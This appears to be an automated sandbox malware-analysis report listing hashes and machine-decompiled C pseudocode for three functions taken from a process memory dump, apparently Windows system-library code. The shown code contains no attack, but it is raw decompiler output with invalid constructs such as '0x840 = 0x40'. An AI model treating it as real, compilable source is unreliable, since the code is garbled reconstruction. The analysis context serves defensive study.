0x0509db8d
0x0509db85
0x0509db74
0x0509dc9f
0x0509dca2
0x0509dcb0
0x0509dcb0
0x0509dad1
0x050eb4e5
0x050eb4c8
0x00000000
0x00000000
0x00000000
0x0509d831
0x0509d80d
0x00000000
0x0509d800
0x050eb47f
0x050eb485
0x00000000
0x050eb485
0x0509d665
0x0509d652
0x00000000

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad837f0922ec1f9f16176c40a284eb7b0ca59164d5b353754ea5d1402f0c8f4a
Instruction ID: c85bbf2a22ecda13a677b7fbeeab1a06b0f164e4d4a4eee4db4d32dcbc8f351a
Opcode Fuzzy Hash: ad837f0922ec1f9f16176c40a284eb7b0ca59164d5b353754ea5d1402f0c8f4a
Instruction Fuzzy Hash: 7BE1D136B043598FEF68CF28E984BADB7B2BF45304F140199D90A57294EB309D81DB91

Uniqueness

Uniqueness Score: -1.00%

Function 0509849B, Relevance: .3, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0509849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x515f9c0);
				E050DD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x5177b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E0509CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E050A2280( *[fs:0x30], 0x5178550);
						_t139 =  *0x5177b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E050BF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E0509FFB0(_t193, _t235, 0x5178550);
								L5:
								return E050DD130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E05081C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x5177b9c; // 0x0
							_t235 = L050A4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x5177b10; // 0x8
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E050BA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E0509FFB0(_t193, _t235, 0x5178550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L050A77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L050A77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x5177b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x5177b10; // 0x8
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E050C37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x5177b9c; // 0x0
									_t214 = L050A4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E050C37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x5177b10 =  *0x5177b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x5177b04 =  *0x5177b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L050A77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L050A77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x5177b08 =  *0x5177b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E050C57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E050CF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L050A77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E050BA44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L050A77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E050C96C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

0x0509849b
0x0509849b
0x0509849b
0x0509849b
0x0509849d
0x050984a2
0x050984a7
0x050984b1
0x050984d8
0x00000000
0x050984b3
0x050984c4
0x050984c9
0x050984cd
0x050984cf
0x050984cf
0x050984d6
0x050984e6
0x050984e9
0x050984ec
0x050984ef
0x050984f2
0x050984f4
0x050984fc
0x05098501
0x05098506
0x05098509
0x050986e0
0x050986e5
0x050986e8
0x050986ed
0x050986f0
0x050986f2
0x050e9afd
0x050e9b02
0x050984da
0x050984df
0x050984df
0x050986fa
0x050986fd
0x050986fe
0x05098701
0x05098706
0x05098709
0x0509870b
0x00000000
0x00000000
0x05098711
0x05098725
0x05098727
0x0509872a
0x0509872c
0x050e9af0
0x050e9af5
0x05098732
0x05098732
0x05098732
0x05098735
0x05098737
0x05098515
0x05098515
0x05098518
0x0509851d
0x05098523
0x05098527
0x0509852b
0x05098537
0x05098539
0x0509853c
0x0509853e
0x0509868c
0x05098691
0x05098699
0x0509869b
0x05098744
0x05098748
0x050986a1
0x050986a1
0x050986a1
0x050986a4
0x050986a8
0x050e9bdf
0x050e9bdf
0x050986ae
0x050986b0
0x00000000
0x050986b6
0x00000000
0x050e9be9
0x050986b0
0x05098544
0x0509854a
0x0509854d
0x05098551
0x0509876e
0x05098778
0x0509877b
0x05098780
0x05098557
0x05098557
0x0509855d
0x0509855d
0x0509856b
0x0509856e
0x05098570
0x05098573
0x05098576
0x05098576
0x05098579
0x0509857b
0x00000000
0x00000000
0x05098581
0x050985a0
0x050985a2
0x050985a5
0x050985a7
0x050e9b1b
0x050e9b1b
0x0509862e
0x0509862e
0x05098631
0x05098631
0x05098634
0x05098636
0x05098669
0x05098669
0x0509866b
0x050e9bbf
0x050e9bc4
0x050e9bc8
0x050e9bce
0x050e9bce
0x05098671
0x05098671
0x05098674
0x05098676
0x050e9bae
0x050e9bae
0x05098676
0x0509867c
0x0509867e
0x05098688
0x05098688
0x00000000
0x0509867e
0x05098638
0x05098638
0x0509863b
0x0509863e
0x0509863f
0x05098642
0x05098645
0x05098648
0x0509864d
0x050e9b69
0x050e9b6e
0x050e9b7b
0x050e9b81
0x050e9b85
0x050e9b89
0x050e9ba7
0x050e9b8b
0x050e9b91
0x050e9b9a
0x050e9b9f
0x050e9b9f
0x05098788
0x0509878d
0x05098763
0x05098763
0x05098766
0x00000000
0x05098766
0x050e9b70
0x00000000
0x050e9b70
0x05098656
0x0509865a
0x0509865c
0x05098752
0x05098756
0x00000000
0x00000000
0x0509875e
0x00000000
0x0509875e
0x05098662
0x05098662
0x05098662
0x05098666
0x00000000
0x05098666
0x050985b7
0x050985b9
0x050985bc
0x050985bf
0x050985cc
0x050985d1
0x050985d4
0x050985db
0x050985de
0x050985e0
0x050e9b5f
0x00000000
0x050e9b5f
0x050985e6
0x050985ea
0x050986c3
0x050986c5
0x050986c8
0x050986ca
0x050e9b16
0x00000000
0x050e9b16
0x050986d6
0x050985f6
0x050985f6
0x050985f9
0x05098602
0x05098606
0x0509860a
0x0509860b
0x0509860e
0x05098611
0x00000000
0x05098611
0x050985f3
0x00000000
0x050985f3
0x05098619
0x0509861e
0x0509861e
0x05098621
0x05098622
0x05098623
0x05098625
0x0509862c
0x00000000
0x0509873d
0x00000000
0x0509873d
0x05098737
0x0509850f
0x05098512
0x00000000
0x05098512
0x00000000
0x050984d6

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd98d71dc8def5ffb7973acc6aeb018c440c603b628ad21a50034518bcdf42a8
Instruction ID: cf987b45637ed7605059f8d3092c557894086efaf71495be666a327d7306751a
Opcode Fuzzy Hash: cd98d71dc8def5ffb7973acc6aeb018c440c603b628ad21a50034518bcdf42a8
Instruction Fuzzy Hash: 6BB15AB4E04249DFDF19DF98E984AADBBB6FF49304F108129E405AB389DB70A841DB50

Uniqueness

Uniqueness Score: -1.00%

Function 050B513A, Relevance: .3, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E050B513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x517d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E050CD0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E050A2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L050A4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E050CF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E0509FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x517b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E050CB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x050b5142
0x050b514c
0x050b5150
0x050b5157
0x050b5159
0x050b515e
0x050b5165
0x050b5169
0x050b516c
0x050b5172
0x050b5176
0x050b517a
0x050b517a
0x050b517a
0x050b517f
0x050f6d8b
0x050f6d8e
0x050f6d91
0x050f6d95
0x050f6d98
0x050f6d9c
0x050f6da0
0x050f6da3
0x050f6da7
0x050f6e26
0x050f6e26
0x050f6e2a
0x050b51f9
0x050b51f9
0x050b51fe
0x050f6e33
0x050f6e33
0x050f6e39
0x050f6e3d
0x050f6e46
0x050f6e50
0x00000000
0x00000000
0x050f6e52
0x050f6e53
0x050f6e56
0x050f6e5d
0x00000000
0x00000000
0x00000000
0x050f6e5f
0x050f6e67
0x050f6e77
0x050f6e7f
0x050f6e80
0x050f6e88
0x050f6e90
0x050f6e9f
0x050f6ea5
0x050f6ea9
0x050f6eb1
0x050f6ebf
0x00000000
0x00000000
0x050f6ecf
0x050f6ed3
0x00000000
0x00000000
0x050f6edb
0x050f6ede
0x050f6ee1
0x050f6ee8
0x050f6eeb
0x050f6eed
0x050f6ef0
0x050f6ef4
0x050f6ef8
0x050f6efc
0x00000000
0x00000000
0x050f6f0d
0x050f6f11
0x050f6f32
0x050f6f37
0x050f6f3b
0x050f6f3e
0x050f6f41
0x050f6f46
0x00000000
0x00000000
0x050f6f4c
0x050f6f50
0x050f6f50
0x050f6f54
0x050f6f62
0x050f6f65
0x050f6f6d
0x050f6f7b
0x050f6f7b
0x050f6f93
0x050f6f98
0x050f6fa0
0x050f6fa6
0x050f6fb3
0x050f6fb6
0x050f6fbf
0x050f6fc1
0x050f6fd5
0x050f6fda
0x050f6fda
0x050f6fdd
0x050f6fe2
0x050f6fe7
0x050f6feb
0x050f6fef
0x050f6ff3
0x050b520c
0x050b520c
0x050b520f
0x050b5215
0x050b5234
0x050b523a
0x050b523a
0x050b5244
0x050b5245
0x050b5246
0x050b5251
0x050b5251
0x050f6f13
0x050f6f17
0x050f6f17
0x050f6f18
0x050f6f1b
0x050f6f1f
0x050f6f23
0x00000000
0x050f6f28
0x050b5204
0x050b5204
0x050b5208
0x00000000
0x050b5208
0x050b5185
0x050b5188
0x050b518a
0x050b518e
0x050b5195
0x050f6db1
0x050f6db5
0x050f6db9
0x050b519b
0x050b519b
0x050b519e
0x050b51a7
0x050b51a9
0x050b51a9
0x050b51b5
0x050b51b8
0x050b51bb
0x050b51be
0x050b51c1
0x050b51c5
0x050b51c9
0x050b51cd
0x050b51cd
0x050b51d8
0x050b51dc
0x050b51e0
0x050f6dcc
0x050f6dd0
0x050f6dd5
0x050f6ddd
0x050f6de1
0x050f6de1
0x050f6de5
0x050f6deb
0x050f6df1
0x050f6df7
0x050f6dfd
0x050f6e01
0x050f6e05
0x050f6e09
0x050f6e0d
0x050f6e11
0x050f6e11
0x050b51eb
0x050f6e1a
0x050f6e1f
0x050f6e21
0x050f6e23
0x00000000
0x050b51f1
0x050b51f1
0x00000000
0x050b51f1

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57a388d9eebe9830bd1d9c96df185cac7abfc52ab3d4a339b32fa87145782fdd
Instruction ID: 10fbd3b6762095adf657f134e3406a1c7e76a76d8552dfdb958a8f3c9b85b96f
Opcode Fuzzy Hash: 57a388d9eebe9830bd1d9c96df185cac7abfc52ab3d4a339b32fa87145782fdd
Instruction Fuzzy Hash: 13C144756093809FD754CF28D480A6AFBF1BF89304F184A6EF9998B392D771E845CB42

Uniqueness

Uniqueness Score: -1.00%

Function 050B03E2, Relevance: .3, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E050B03E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x517d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E050B0548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E050CB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E0509B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x5177c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E050A7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E050A7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E05107016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E050C9830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E051069A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x5177c04 != 0) {
						_t118 = _v12;
						_t120 = E0510A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x5177bd8;
						if( *0x5177bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E050C95D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E050C99A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E05103540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E0508B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
